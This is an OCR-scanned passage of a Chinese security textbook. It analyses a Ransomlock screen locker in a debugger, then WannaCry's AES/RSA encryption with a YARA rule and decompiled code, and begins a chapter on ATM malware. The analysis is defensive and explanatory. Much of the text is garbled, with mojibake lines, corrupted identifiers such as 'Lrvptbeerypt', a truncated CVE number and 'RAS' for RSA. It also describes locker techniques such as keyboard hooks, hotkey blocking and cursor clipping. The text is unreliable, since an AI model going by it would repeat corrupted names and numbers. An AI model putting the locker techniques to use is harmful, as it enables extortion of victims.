事件 : explorerexe 进 程 将 被 终止 ， 此 外 任务 栏 会 被 移 除 且 终 闯 用 户 将 无 法 访问 它 目 。 
而 后 键盘 输入 将 被 拦截 四 ， 因 此 一 旦 恶意 窗口 被 激活 ， 受 害 者 就 无 法 使 用 键盘 。 通 
过 单 步调 试 和 检查 堆栈 中 的 HookType 参 数 (其 值 为 0， 表示 WH KEYBOARD)， 可 知 
0012F964 00000002 | HookType 
0012F968 00410078 |Hookproc = locker.00410078 


0012F96C 00400000 |hModule = 00400000 (locker) 
0012F970 | 00000000 £\ThreadID = 0 


注意 : 恶意 软件 还 会 执行 其 他 很 多 操作 。 但 由 于 篇 幅 所 限 ， 这 里 只 列举 
与 主题 最 相关 的 那些 。 

继续 往 下 调试 ， 我 们 发 现 了 一 个 循环 ， 它 的 唯一 用 途 就 是 找 出 并 最 小 化 所 有 果 
面 窗 口 : 


00410D47 PUSH OFF 

00410D4C LEA EAX, DWORD PTR SS: [ESP+4] 

00410D50 PUSH EAX 

00410D51 PUSH EBX 

00410D52 CALL locker.004051BC ; JMP to USER32.GetWindowTextA 
00410D5»5/ PUSH ESP 

00410D58 PUSH 0 

00410D5A CALL locker.00405194 ; JMP to USER32.FindWindowA 
00410D5F MOV ESI,EAX 

00410D01 PUSH ESI 

00410D62 CALL locker.00404EEC ; JMP to USER32.IsWindowVisible 
00410D67/7 TEST EAX,EAX 

00410D69 JE SHORT locker.00410D/D 

OO410D6B PUSH 0 

00410DO6OD PUSH OFO020 

00410D72 PUSH 112 

00410D77 PUSH ESI 

00410D78 CALL locker.004051EC ; JMP to USER32.PostMessageA 
00410D/D PUSH 2 

00410D/F PUSH EBX 

00410D80 CALL locker.00404EB4 ; JMP to USER32.GetWindow 
00410D85 MOV EBX,EAX 

00410D87/ TEST EBX, EBX 

00410D89 JNZ SHORT locker.00410D47 


该 检查 的 含义 不 言 自明 一 一 获取 当前 窗口 中 显示 的 标题 (通过 函数 GetWindowTextA) 
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并 检索 该 窗口 。 硅 该 窗口 可 见 ， 则 通过 调用 包括 以 下 参数 的 PostMessage 函 数 将 其 最 
小 化 : 
0012F964 hWnd = 180174 


0012F968 Message = WM SYSCOMMAND 
0012F96C Type = SC MINIMIZE 


此 循环 的 最 后 一 步 是 调用 函数 GetWindow, 以 找到 当前 显示 的 下 一 个 可 用 窗口 。 
该 循环 将 一 直 执 行 ， 直 到 不 存在 最 大 化 的 窗口 。 

一 旦 所 有 窗口 都 被 最 小 化 后 ， 循 环 将 再 次 通过 调用 FindWindowA 来 检索 恶意 窗 
口 ， 随 后 调用 PostMessageA 来 恢复 正常 显示 : 

00410DAC CALL locker.004051EC ; JMP to USER32.PostMessageA 


0012F964 hWnd = 50528 
0012F968 Message = WM SYSCOMMAND 
0012F96C Type = SC RESTORE 


再 次 跳 转 到 另 一 组 指令 中 ， 因 此 单 步 执行 ( 按 F7 键 ) 以 下 调用 来 继续 跟踪 : 
Q00410DB9 CALL locker.00407DBO0 

此 处 开始 添加 恶意 窗口 的 内 容 : 

00407DCD CALL locker.004051FC ; JMP to USER32.SendMessageA 
堆栈 上 的 调用 参数 如 下 : 


0012F95C hWnd = 30522 

0012F960 Message = WM SETTEXT 

0012F964 wParam = 0 

0012F968 \Text = "VyaéypOhy íàGógáíóái eéoáicéíiiiiái 

nia6asaiey ii yenieóaoaoee Il éeióiióàóéé Microsoft." 

在 函数 SetWindowPos 处 设置 一 个 断 点 并 按 F9 键 转 到 那里 。 再 按 AlttF9 以 返回 恶 
意 程序 .此 时 应 该 能 看 到 勒索 软件 的 弹出 窗口 了 。 该 API 调 用 使 用 HWND_ TOPMOST 
作为 参数 ， 这 意味 着 该 弹出 窗口 将 始终 位 于 系统 中 显示 的 所 有 窗口 的 最 顶层 : 

0012F920 CALL to SetWindowPos from locker.00411603 

0012F928 InsertAfter = HWND TOPMOST 


如 图 19-9 所 示 ， 我 们 可 以 看 到 Ransomlock 窗 口 了 ! 但 系统 锁定 还 未 完成 。 在 调 
试 器 的 帮助 下 ， 恶 意 软件 终 为 我 们 所 控制 。 
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z3izterz CF PUI 


| USERS? .Fincllindoan 


oF incllindowA 
ALLL 


Na LastErr ERHÜR 5 
MEA (HD. 


OWS s CAAFIRED AAT! 


S5: CEEF- 184], ECH 


IE: G8 AQHA LIS TB。 ， 
cürspot4 | Bi4dEBELB c 


19-9 aH REIR LBS ES f LI 


ALY SUETON DRE d. TRU ZI AE, FTA 55 TIE TT AC FST ST Aho. {AA 
PAB ES fi CC BEL SH? Ar T PUE BOM RE, AOE iA Abe, v 
也 依然 会 被 遮挡 。 这 样 受 感染 的 用 户 将 只 能 与 勒 案 窗 口交 互 。 在 这 个 环境 中 ， 只 把 
下 浏览 磺 和 计算 需 窗 口 最 大 化 了 ， 但 不 出 所 料 ， 它 们 都 最 示 在 勒索 窗口 的 后 面 (如 
图 19-10 所 示 )。 


EB. RSSLESEEE | FRU 


Em Chow Window Function mii... 


Parameters 


hina [in] 
Type; HWND 


Change i modele tar 
A handle ta the window. 
hangeWir "nes ilterE 
Child WindowFromPoant nCcmashow [in] 
Type: int 
haldv verom dr 
"lese Wines Controls how the window is to be she 


Show Window, if the program that lai 
Otherwise, the first time ShowWindo 


funchion in its elon how parameter 


reba inl ey 
Create WündewFs 


Defter'WindowP on Vales, 
Depeg ter shell ook Window , 

Value Meani 
Destroy Window 


End Defer WVindowPos Minim 
SW FORCEMIMIMIZE respor 
Erd Task 44 PAP ee — m A I A E I M d. 
ll from a 3 


nu mChildProc 


E hile à A 
| é van M WE | Ane. T cy asi sie. 这 abado aadädi 
E hreacdVüindow a - 3 f i i adeat rivea zc aonasnaeon 

(E 
En hreacMndPro 
Emum 


Eri iina Pro SW MAXIMIZE 


J r 
Firinda 2 
Prem USERS. TAT ECA 


[19-10 ITEM RAAT RA d ——— 窗口 的 后 面 


可 通过 View | Windows 沈 单 选 项 来 得 看 所 有 与 该 进程 相关 的 窗口 。 在 那里 我 们 
可 证 实 ， 恶 意 窗 口 被 设置 为 最 顶层 。 也 可 从 ClsProc 栏 看 出 该 置顶 寄 口 的 事件 处 理 
函数 的 地 址 是 0x0040$428， 如 图 19-11 所 示 。 我 们 可 在 那里 设置 一 个 断 点 来 捕捉 与 该 
窗口 相关 的 每 一 个 动作 。 
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图 19-11 “恶意 进程 相关 窗口 


特别 是 对 于 勒索 软 件 的 分 析 ， 强 烈 建议 使 用 诸如 Visual Studio 中 的 Spy++ 这 样 的 
工具 来 识别 出 系统 中 所有 隐藏 的 窗口 及 其 属性 。 

在 地 址 0x00411005 处 通过 调用 ResisterHotKey 函 数 为 恶意 窗口 屏蔽 热 键 
Alt+Tab。 这 样 一 旦 加 和 面 被 锁定 ， 用 户 试 图 切换 到 男 一 个 窗口 时 将 被 拒绝 : 


00411005 CALL locker.00404FlC ; JMP to USER32.RegisterHotKey 
以 下 是 堆栈 上 的 调用 参数 : 


0012F904 hWnd = 00130540 
('qwjdzlbPyUtravVxKLIfZsp3B9Y40...',class-'obj Form") 
0012F908  HotKeyID = 1 

0012F90C  Modifiers — MOD ALT 

0012F910 Key = VK TAB 


在 后 面 的 指令 中 ， 有 一 处 调用 了 ClipCursor API: 

00411043 CALL locker.00404E1C ; JMP to USER32.ClipCursor 
堆栈 上 的 调用 参数 如 下 : 

0012F910 pRect = 0012F924 {639.,588.,1289.,622.}® 


Val FRC ADB ERU D rl E RS s. B EE DXX B. EE, HEE RAIA 
标 人 @ 会 作为 参数 传 入 。 

调用 成 功 后， 将 迫使 受害 者 只 能 与 勒索 窗口 进行 交互 (通过 鼠标 )! If Eod BER: 
的 其 余 区 域 将 不 起 任何 作用 。 这 时 候 你 的 果 面 应 该 已 经 被 锁定 了 了 ， 但 因此 时 恶意 软 
件 尚 未“ 大功 告 成 ”一 一 还 需要 进行 更 多 的 操作 才能 完全 控制 你 的 时 面 。 因 此 ， 我 
们 可 在 函数 SetFocus 上 设置 一 个 断 点 (通过 命令 行 运行 bp SetFocus)。 按 F9 键 ， 青 按 
AltrF9 组 合 键 ， 程 序 结束 ! 

在 内 部 ， 恶 意 软 件 会 执行 一 个 无 限 循 环 以 确保 所 有 时 面 窗 口 都 被 最 小 化 。 可 通 
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过 先 按 下 Ctrl+Altt+Del 组 合 键 ， 再 按 下 Alt+T 组 合 键 ， 打 开 任 务 管理 器 窗口 来 验证 这 
个 行为 。 访 窗口 刚 一 显示 ， 就 被 勒索 软件 最 小 化 了 。 

有 趣 的 是 ， 如 果 我 们 在 文本 框 中 输入 一 个 假 的 号 码 ， 并 壬 试 捕获 与 C&C 之 间 的 
网 络 流量 ,然后 单 击 OK 按钮 发 送 付款 ,恶意 软件 将 不 会 采取 任何 行动 。 然 而 ,尽管 
这 使 得 恶意 软件 看 上 去 像 是 处 于 非 活动 状态 ， 但 遗憾 的 是 ， 这 并 不 能 使 我 们 重新 恢 
复 对 机 吉 的 控制 权 。 

恶意 软件 还 符 试 一 些 其 他 手段 来 支持 条 面 ,其 中 一 些 因为 扩 术 过 于 陈旧 而 失败 。 
这 里 我 们 只 专注 于 能 真正 帮助 理解 勒索 软件 内 部 工作 原理 的 那些 最 曹 要 手段 。 

恶意 软件 使 用 了 一 些 虽 陈旧 但 仍然 有 效 的 昌 面 劫持 撤 术 (请 参见 “扩展 阅读 ”中 
的 一 些 例子 )。 我 们 已 经 了 解 到 ,勒索 软件 所 实现 的 如 面 动 持 核心 技术 与 窗口 系统 相 
A. PREAH ae LAS: 

(1) 在 一 个 无 限 循环 中 最 小 化 所 有 窗口 。 当 一 个 新 窗口 被 最 大 化 时 ， 它 将 立即 
被 最 小 化 。 

(2) 挂 起 键盘 ， 使 其 不 能 被 受害 者 使 用 。 

(3) 屏 珊 Alt+Tab 之 类 的 特殊 热 键 ， 以 防止 受害 者 切换 到 其 他 窗口 。 

(4) 将 恶意 窗口 置 项 ， 这 样 任何 其 他 可 能 的 弹出 窗口 将 总 是 显示 在 它 的 后 面 。 

(5) 将 鼠标 的 使 用 限定 在 恶意 窗口 所 在 的 区 域 。 

虽然 被 恶意 软件 锁定 昌 面 的 后 果 很 可 怕 ， 但 大 多 数 时 候 这 种 恶意 软件 将 作为 一 
个 独立 程序 ， 从 文件 系统 的 茶 一 特定 位 置 执行 。 因 此 很 容易 将 其 禁用 : 使 用 Live CD 
局 动 计算 机 ， 右 使 用 的 是 Linux 发 行 版 ， 则 需要 挂 载 Windows 人 硬盘 驱 动 苍 ， 并 使 用 被 
感染 用 户 的 账户 来 搜索 可 执行 文件 即 可 。 以 下 是 应 该 检查 的 常见 路 径 : 

c:\Users\<user>AppData 

c:\Users\<user>Local Settings 

c:\Users\<user>Application Data 

也 可 在 安全 模式 下 启动 ， 并 进入 注册 表 编辑 器 以 查看 Run 键 ， 在 那里 可 能 会 找 
到 该 可 执行 文件 的 名 称 ( 有 多 个 注册 表 项 可 用 于 在 系统 重 司 后 运行 恶意 软件 ): 


HKLMNSoftwareMMicrosoftNWindowsNCurrentVersionMRun 
19.4 Wannacry 


Wannacryzé — 4 4 AAWR EIER RS, IBEUT20175E5 A, JPR ERA 
球 媒体 报道 的 对 象 。 之 所 以 称 为 蠕虫 ， 是 因为 它 使 用 名 为 ETERNALBLUE 的 漏洞 
CVE-2017-014， 通 过 服务 器 消息 块 (Server Message Block，SMB) 协 议 感染 互联 网 上 
存在 漏洞 的 Windows 主 机 。 访 漏洞 作为 Shadow Brokers 黑 客 团队 汇 露 的 信息 的 一 部 分 
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被 公开 ， 因 而 十 分 著名 。 该 团队 公开 发 布 了 由 NSA 开 发 和 使 用 的 攻击 工具 ， 其 中 一 
个 便 是 ETERNALBLUE。 

Wannacry X Crypters H RIF AUN Mo, 它 会 加 密 受 害 人 的 数据 ， 并 扣留 数 
据 进 行 勒 索 。 本 节 将 介绍 用 于 分 析 Wannacry 勒 索 软 件 的 方法 , 并 尝试 回答 以 下 问题 : 

e 如何 加 密 文 件 ， 使 用 哪些 加 秘方 法 ? 

e 可 解密 已 被 勒索 的 文件 吗 ? 


示例 19-3: 4f WannacryS zs xf 


对 受 影响 的 党 害 人 而 言 ， 识 询 和 理解 勒索 软件 使 用 的 加 密 方 寨 是 信息 最 重要 的 
部 分 。 该 信息 有 助 于 显示 文件 加 密 或 密 钥 管理 实现 中 的 任何 漏洞 ， 或 许可 由 此 恢复 
ATONE. ATTA, AARAA TREBLE, RO, SBA 
可 以 排列 工作 的 优先 顺序 ， 并 进行 修复 。 

e 对 称 加 密 算 法 ”这 些 算 法 对 加 密 和 解密 使 用 相同 的 密 钥 。 与 非 对 称 加 密 算 法 

相 比 ， 此 类 算法 加 密 和 人 解密 数据 的 速度 要 快 得 多 ; 此 时 ， 通 第 需要 勒索 软件 
在 受 感染 的 计算 机 上 “泄露 ”解密 密 钥 ， 因 为 加 密 时 使 用 了 同样 的 密 钥 。 
e 非 对 称 加 密 算法 ”此 类 算法 使 用 两 个 密 钥 : 一 个 公 铀 ， 一 个 私 铀 。 公 钥 可 由 
MARA RK, AAT Ie. BS, mee AA, M 
ALA EH RS PE ee ER, BRAC AACA SORE. ARM ARTIS RE 
最 音 用 于 安全 地 交换 对 称 密 钥 ， 再 使 用 对 称 加 密 算法 来 快速 地 加 和 密 和 解密 
设计 安全 加 密 系 统 是 一 项 复杂 的 工作 。 要 达到 真正 安全 的 效果 ， 需 要 根据 相互 
联系 的 片段 ， 如 算法 、 密 钥 参 数 、 密 钥 处 理 和 安全 意识 ， 精 心 设计 系统 。 

由 于 实现 加 密 算 法 十 分 复杂 ， 而 且 这 项 工作 对 安全 影响 较 大 ， 大 多 数 开 发 人 员 
决定 使 用 操作 系统 加 密 API， 或 以 静态 或 动态 方式 导入 第 三 方 加 蜜 库 。 要 确认 恶意 
软件 是 否 使 用 了 本 地 的 加 密 API， 最 简易 的 方式 是 检查 导入 的 函数 。 

对 于 静态 链接 库 ， 要 识别 使 用 的 加 密 算法 ， 最 古老 、 最 简单 的 一 种 方式 是 使 用 
算法 所 依赖 的 各 种 第 量 的 静态 人 签名。 利用 这 些 第 量 进行 检测 的 一 种 早期 工具 是 
KANAL-Crypto Analyzer， 它 是 PEiD 签 名 扫描 器 的 插件 。 现 在 ， 大 多 数 工 具 都 依赖 
于 静态 签名 的 YARA 格 式 , 或 允许 用 户 利 用 第 三 方 插件 的 签名 。 一 些 文 持 YARA 的 痢 
见 逆向 工程 工具 是 IDA、x64dbg、Binary Ninja 和 Radare2 。 


X 注意 : 本 节 将 要 分 析 的 twnry Wannacry ZB fF 4 MD5 ^ 75 [à X 
V F381EIFCCAOCA4EA05FCA4DI15A17F8B36. 

开始 识别 加 密 算 法 时 ， 需 要 打开 IDA 中 的 twnry 组 件 ， 并 分 析 PE 文 件 的 Imports 
部 分 。 通 过 按 名 称 排 序 导 入 的 函数 ， 可 按 提 供 的 功能 来 组 织 函 数 ， 并 确定 几 个 加 
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45 API: 

e CryptExportKey ZRA UZETA. MOUTH A GEE (Cryptographic 

Service Provider, bipes 钥 或 密 钥 对 。 

e CryptReleaseContext — VERUM T EEXCSP HJ RES HA 88 o 

e CryptGenRandom 该 函数 使 用 加 蜜 的 随机 字 节 来 填充 缓冲 区 。 

e CryptGetKeyParam 该 函数 检索 用 于 管理 密 钥 操作 的 数据 。 

可 过 过 村 入 的 函数 来 大致 了解 加 军功 能 ， 但 无 法 了解 所 处 理 异 法 的 细 太 。 无 论 
如 何 ， 分 析 人 员 都 可 通过 这 条 捷径 来 找到 负 贡 所 需 功能 (此 处 的 功能 是 加 窗 ) 的 函数 。 


<x 注意 : 这 种 分 析 方 法 被 称 为 自 下 而 上 的 方法 。 它 借助 可 用 的 线索 ， 有 效 地 
Vox 指导 分 析 工 作 ， 专 注 于 回答 特定 问题 。 当 处 理 极 大 或 极 复杂 的 二 进 制 代 码 
时 ， 这 种 方法 极其 有 用 。 


在 加 蜜 识别 的 第 二 个 基本 步骤 中 , 将 使 用 IDA 的 fmndcrypt-yara 插 件 。 访 插件 齐 循 
多 个 开源 YARA 规 则 , 可 以 检测 导入 的 (或 动态 解析 的 ) 加 密 函 数 以 及 与 加 密 算 法 相关 
的 不 同 加 密 和 常量 。 下 面包 含 的 YARA 签 名 缺少 一 些 常见 的 加 密 API 签 名 ， 因 此 ,在 所 
分 析 的 样本 上 运行 前 ， 我 们 琴 加 以 下 YARA 规 则 ; 


rule Advapi Crypto API { 
meta: 
description = "Identify Crypto API functions." 
strings: 


$ = "CryptGenKey" 

$ = "Lrvptbeerypt" 

$ = "CryptEncrypt" 

$ = "CryptDestroyKey" 

$ = "CryptImportKey" 

$ = "CryptAcquireContextA" 


condition: 
any of them 
} 


在 所 分 析 的 文件 上 运行 FindCrypt 插 件 ， 将 报告 9 个 匹配 的 签名 ， 包 括 3 个 
RijnDael AES 以 及 6 个 Crypt* API。 这 些 并 未 显示 在 前 面 分 析 的 Imports 部 分 。 通 过 得 
看 已 识别 的 第 量 ， 可 以 确信 这 里 的 勒索 软件 使 用 的 是 AES 加 蜜 算法 ， 并 且 可 能 使 用 
了 其 他 一 些 算法 。 识别 CryptAcquireContextA 中 使 用 的 CSP, 将 缩小 可 用 算法 的 范围 ; 
Alt, H5 CryptAcquireContextA FF FF H3 dE rd X 5| HREF): 


.-data:1000D1F8 aCryptacquireco db 'CryptAcquireContextA',0 


该 字 从 串 只 用 于 一 个 位 置 ， 相 应 的 函数 负 贡 动态 解析 加 密 函 数 。 为 变量 名 和 类 
型 添加 注解 后 ， 在 Hex-Rays 反 编 诺 项 中 ， 代 人 码 将 如 下 所 示 : 
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BOOL ResolveCryptAPIs() 
{ 
BOOL result; 
HMODULE rLoadLibrary; 
HMODULE v2; 
BOOL ( stdcall *CryptGenKey ) (HCRYPTPROV, ALG ID, DWORD, HCRYPTKEY *); 


if ( CryptAcquireContextA ) 
return 1; 

rLoadLibrary = LoadLibraryA (LibFileName) ; 

v2 = rLoadLibrary; 

result = 0; 

if ( rLoadLibrary ) 

{ 
CryptAcquireContextA = GetProcAddress (rLoadLibrary, aCryptacquireco) ; 
CryptiImportKey = GetProcAddress (v2, aCryptimportkey) ; 
CryptDestroyKey = GetProcAddress (v2, aCryptdestroyke) ; 
CryptEncrypt = GetProcAddress (v2, aCryptencrypt) ; 
CryptDecrypt = GetProcAddress (v2, aCryptdecrypt) ; 
CryptGenKey = GetProcAddress (v2, aCryptgenkey) ; 
CryptGenkey = CryptGenkey ; 
if ( CryptAcquireContextA ) 

{ 


if ( CryptImportKey && CryptDestroyKey && CryptEncrypt && 
CryptDecrypt && CryptGenKey ) 
result = 1; 


} 


return result; 


注意 : 在 恶意 软件 中 ， 经 常 使 用 LoadLibrary 和 GetProcAddress 来 动态 解析 
API 束 数 。 它 允许 作者 对 依赖 于 导入 表 的 静态 分 析 工 具 隐 藏 相关 功能 。 这 
APA kA Hope 或 加 密 API 函 数 的 字符 串 ， 进 一 步 阻 目 
静态 签名 以 及 对 可 执行 功能 的 推理 。 在 分 析 恶 意 软件 时 ， 务 必 检 查 代码 中 
po a i po Adds API3| 用 ,确定 它们 是 否 正 在 解析 其 他 APTI. 


在 IDA 中 处 理 动态 解析 的 API 时 ， 可 将 变量 命名 为 解析 的 函数 ，IDA 将 日 动 应 用 
相应 的 API 原 型 。 下 面 的 示例 将 变量 命名 为 CryptAcquireContextA: 


.data:1000D93C ; BOOL stdcall CryptAcquireContexta ( 
HCRYPTPROV *phProv, LPCSTR pszContainer, LPCSTR pszProvider, 
DWORD dwProvType, DWORD dwFlags) 

.data:1000D93C CryptAcquireContextA dd 0 
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该 原型 看 上 去 正确 无 误 ， 但 它 不 允许 IDA 在 反 汇 编 中 传递 参数 名 ， 导 致 反 编 译 
髓 的 表示 有 些 凌 乱 。 此 处 的 问题 在 于 ， 由 IDA 分 配给 变量 的 上 自动 类 型 是 函数 声明 而 
非 函 数 指针 。 为 修正 变量 的 类 型 ， 记 看 将 函数 名 放 在 圆 括 写 中 ， 并 在 名 称 前 加 上 指 
针 (*)， 从 而 改 成 函数 指 和 寺 ， 如 下 所 示 : 


(*CryptAcquireContextA) 


要 确定 CSP， 继 续 查 看 CryptAcquireContextA 的 交叉 引用 ， 并 分 析 .text:10003A80 
处 的 函数 。 为 函数 指针 湛 加 注解 后 ， 可 方便 地 识别 参数 名 称 并 但 找 pszProvider 参 数 
HAVEL: 

-text:10003A92 push 18h ; dwProvType 


.text:10003A94 ; "Microsoft Enhanced RSA and AES Cryptographic Provider" 
.Lext:10003A94 and eax, offset aMicrosoftEnhan 


.Lext:10003A99 push eax ; pszProvider 
.Lext:10003A9A push 0 ; pszContainer 
.text:10003A9C push edi ; phProv 


.text:10003A9D call CryptAcquireContextA 


恶意 软件 使 用 的 CSP 支 持 AES 和 RSA 算 法 。 我 们 已 经 在 样本 中 找到 AES 常 量 ， 
因此 ， 这 将 又 一 次 确认 在 加 密 和 /或 解密 中 以 茶 种 形式 使 用 了 AES 算 法 。RAS 的 使 用 
尚未 得 到 证 实 ， 因 此 ， 下 一 步 将 理解 这 个 加 密 程 序 是 如 何 使 用 的 。 继 续 分 析 当 前 函 
数 的 XREF， 并 查看 sub 10003AC0。 由 于 该 函数 可 能 包含 与 加 密 相 关 的 逻辑 ， 我 们 
需要 理解 该 代码 以 及 周围 的 所 有 函数 。 

在 此 类 情况 下 ， 需 要 深入 了 解 函数 细节 ， 因 此 目 上 而 下 的 方式 最 为 合适 。 此 时 ， 
所 有 函数 都 是 API 的 简单 包装 ， 此 处 不 再 歼 述 。 图 19-12 是 sub 10003AC0 调 用 函数 的 
IDA 邻 接 关 系 视 图 ， 已 经 被 重 命名 为 InitializeKeys。 


Ws 


+) 


图 19-12 ” IDA 邻接 关系 视图 


c 注意 : 利用 IDA Proximity2l 5,25, T Zr 48 452 XE UAE EJ, A S px] 48 


LS 。 关 函数 。 在 自 上 而 下 的 分 析 过 程 中 ， 如 果 周 围 的 函数 都 已 经 命名 ， 邻 接 关 
系 视图 将 最 有 用 。 
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InitializeKeys 函 数 显 示 了 这 种 加 密 设 置 的 几 个 重要 属性 : 

恶意 软件 内 置 的 硬 编码 是 2048 位 的 RSA 公 和 钥 。 

样本 生成 了 新 的 2048 位 的 RSA 公 钥 / 私 钥 对 。 

公 钥 以 未 加 密 形 式 保存 为 文件 系统 中 的 00000000.pky。 

私 钥 使 用 的 内 置 硬 编码 是 RSA 公 和 钥 ， 加 密 后 保存 为 00000000.eky。 

e 使 用 CryptDestroyKey API 从 内 存 销毁 密 铀 。 

可 以 看 到 ， 使 用 内 置 的 公 钥 加 密 了 生成 的 私 钥 并 在 使 用 后 销毁 ， 这 表明 生成 的 
密 钥 对 的 公 钥 部 分 加 密 了 重要 的 内 容 。 由 于 私 钥 被 攻击 者 的 公 钥 加 密 过 ， 只 有 攻击 
者 可 以 访问 加 密 过 的 密 钥 ， 也 只 有 攻击 者 才能 解密 用 生成 的 公 钥 加 密 的 内 容 。 由 于 
生成 的 公 钥 用 于 加 密 重 要 的 内 容 ， 下 一 步 将 进一步 确定 。 

为 查找 使 用 密 钥 来 加 密 数据 的 代码 位 置 ， 需 要 再 次 利用 XREF 来 识别 使 用 
CryptEncrypt API 的 位 置 。 共 有 5 个 引用 ， 其 中 3 个 引用 已 在 研究 InitializeKeys 时 分 析 
过 。 这 里 将 查看 sub 10004370. 

该 函数 十 分 简单， 它 使 用 CryptGenRandom API 随 机 生成 16 字 市 的 缓冲 区 ， 并 用 
生成 的 RSA 公 钥 加 蜜 缓冲 区 。 未 加 密 的 组 种 区 和 已 加 蜜 的 绥 冲 区 都 返回 给 调用 函数 。 
跟踪 调用 函数 中 使 用 的 两 个 缓冲 区 ， 可 注意 到 以 下 区 别 : 

e 己 加 密 的 缓冲 区 作为 “ 涉 ” 的 一 部 分 写 入 文件 。 

e 未 加 密 的 缓冲 区 用 作 AES 密 钥 ， 以 加 密 被 勒 案 文件 的 内 容 。 

现在 ， 你 已 经 收集 到 所 有 片段 。 下 面 说 明 Wannacry 如 何 使 用 AES 和 RAS 来 加 密 
文件 。 

(1) 为 每 个 受 感染 的 机 器 生成 一 个 新 的 2048 位 的 RSA 密 钥 对 。 

(2) 用 攻击 者 硬 编码 的 RAS 公 钥 加 密 RSA 私 钥 ， 这 样 ， 除 攻击 者 外 ， 其 他 人 都 
无 法 解密 机 器 的 私 钥 。 

(3) 为 Wannacry 加 和 密 的 每 个 受害 文件 生成 一 个 随机 的 128 位 的 AES 密 钥 。 

(4) 生成 的 RSA 对 的 公共 部 分 用 于 加 密 AES 密 钥 (AES 密 钥 用 于 加 密 用 户 的 文 
件 )， 并 保存 为 受害 方 的 加 密 文 件 头 的 一 部 分 。 

这 种 加 密 设 计 可 谓 固 看 金汤 。 只 有 攻击 者 拥有 内 置 硬 编码 的 公 钥 的 私有 部 分 ; 
因此 ， 除 了 攻击 者 之 外 ， 任 何人 都 不 能 解密 AES 密 钥 ( 重 申 一 次 ，AES 密 钥 用 于 加 密 
用 户 的 文件 )。 

但 是 ， 让 受害 方 感到 欣慰 的 是 ， 理 论 概念 和 实际 实现 之 间 经 常 存 在 差 踊 ， 安 全 
研究 人 员 可 利用 这 个 差距 找到 微妙 的 区 别 , 并 针对 实现 的 缺陷 进行 还 击 。 在 本 例 中 ， 
研究 人 员 已 经 发 现 , 在 一 些 Windows 版 本 中 ,由 于 内 存 清除 不 够 充分 , 存在 恢复 RSA 
私 钥 桑 数 的 可 能 性 。 此 时 ， 如 果 受 害 方 尚 未 杀 死 勒索 软件 进程 ， 则 可 在 内 存 中 会 找 
RSA 私 钥 ， 并 使 用 这 个 私 钥 解 密 所 有 已 感染 的 文件 。 

另外， 如 果 文 件 不 在 预定 义 的 位 置 列表 中 ， 也 可 利用 文件 删除 方式 的 漏洞。 了 衬 
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典 预 定义 列表 中 的 明文 文件 在 删除 前 会 使 用 随机 数据 进行 章 写 ; 而 其 他 所 有 文件 只 
FEMS ARS AMR, FFAS ECFA. AAR, AP al fe Bs Le Bur 
TA, PORONERIISISCOSCUE, TEETER EBRR SAULT BU SUI « 

受害 方 并 非 总 能 找到 勒索 软件 的 弱点 来 实施 权宜 之 计 ; 但 只 要 努力 ， 或 许 束 能 
成 功 。 通 过 使 用 本 重 介绍 的 目下 而 上 的 方法 ， 分 析 师 可 快速 确定 代码 的 相关 部 分 ， 
深入 分 析 大 型 二 进 制 代码 , 集中 精力 回答 重要 问题 ， 并 寻找 勒索 软件 实现 中 的 昼 反 。 


19.5 本章 小 结 


对 于 逆 同 工程 而 言 ， 应 对 勒索 软件 是 一 项 真正 的 挑战 。 犯 菲 分 子 付出 大 量 的 努 
力 ， 使 得 检测 和 北向 恶意 软件 变 得 极为 困难 ， 以 便 在 恶意 软件 能 被 检测 之 前 尽 可 能 
AX. 

aT ER EAE AIAN TT I. ABE UE A SG a TEA TIAN, AAA 
FAP AZAR WIA, MERIR. Wannacry 828 AUF BRTT IER, SAT, 


AKA, ico A n 22K SES E dese we De WO RAS. APER TTI 


是 一 个 世界 性 难题 。 
定期 将 所 有 个 人 数据 备份 至 云 服 务 提供 商 处 ， 以 及 定期 更 新 软件 ， 可 能 是 目前 


针对 勒索 软件 最 有 效 的 保护 方案 。 


S208 ATM 恶意 软件 


目 动 柜员 机 (Automated Teller Machine, ATM) 是 犯罪 分 子 心中 的 重点 日 标 , 原因 
十 分 简单 。ATM 中 装 满 了 钞票 ! 20 年 前 ， 犯 罪 分 子 面临 的 挑战 是 如 何 磺 开 装着 钞票 
的 ATM 安 全 箱 ; 近年 来 ， 攻 击 者 已 经 找到 了 通过 恶意 软件 感染 ATM 以 获取 钞票 的 更 
徐 便 途径 。 本 章 将 分 析 近 年 来 出 现 的 一 些 最 危险 的 ATM 和 恶意 软件 。 更 重要 的 是 ， 本 
音 介 绍 有 助 于 识别 攻击 迹象 和 剖析 攻击 所 使 用 的 技术 ， 还 将 讨论 可 缓解 AM 恶意 软 
件 风 险 的 方法 。 


AE NE: 

ATM( 目 动 柜员 机 ) 

XFS( 金 融 服 务 扩展 ，Extensions for Financial Service) 
XFS 体系 结构 

XFS'E El as 

ATM 恶 意 软件 

针对 ATM 和 恶意 软 件 的 对 策 


ATM 己 经 出 现 50 多 年 ， 它 的 主要 作用 是 出 钞 。 如 今 ， 这 些 机 器 也 用 于 支持 生活 
缴 宪 、 将 信用 卡 绑 定 到 手机 、 和 存 球 和 等。 本草 将 介绍 现实 中 使 用 的 NCR Personas 5877 
ATM (P77)， 这 是 基于 Windows PC 的 自助 服务 ATIM。 图 20-1 显 示 了 这 款 ATM 的 外 部 
组 件 。 其 中 一 些 组 件 的 含义 不 言 目 明 ， 但 也 有 一 些 值得 研究 一 番 。 

e 面板 (Fascia) 面板 位 于 ATM 的 顶部 ， 可 打开 面板 访问 ATM 硬 件 。 需 要 使 用 

顶部 的 密码 锁 打 开 面 板 。 

e 密码 锁 (Keyloclio 密码 锁 保 护 ATM 的 下 半 部 分 ， 下 半 部 分 古 安 全 御 ( 和 钞票 ) 


所 处 的 位 置 。 
e 显示 屏 / 触 措 屏 ”即使 古旧 式 显 示 融 也 包 信 触摸屏 ， 文 持 明 过 触 措 屏 与 ATM 
交互 。 


e (Keyboard) 也 称 为 密码 键盘 (pinpad), 允许 用 户 通过 键盘 与 ATM 人 交互 。 
e 出 钞 模块 (Dispenser) 这 是 重要 的 ATM 组 件 ， 用 户 可 从 中 取 钞 ， 稍 后 详细 
介绍 。 
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面板 


SER TT EDL 


图 20-1 NCR Personas 5877 的 外 部 组 件 


图 20-2 显 示 了 打开 上 新 和 下 新 后 ATM 的 内 部 组 件 。 上 半 部 分 包括 PC 内 核 部 分 ， 

基本 上 区 是 运行 操作 系统 的 CPU， 以 及 外 围 组 件 和 闯 口 ， 下 面 列 出 两 个 重要 组 件 : 

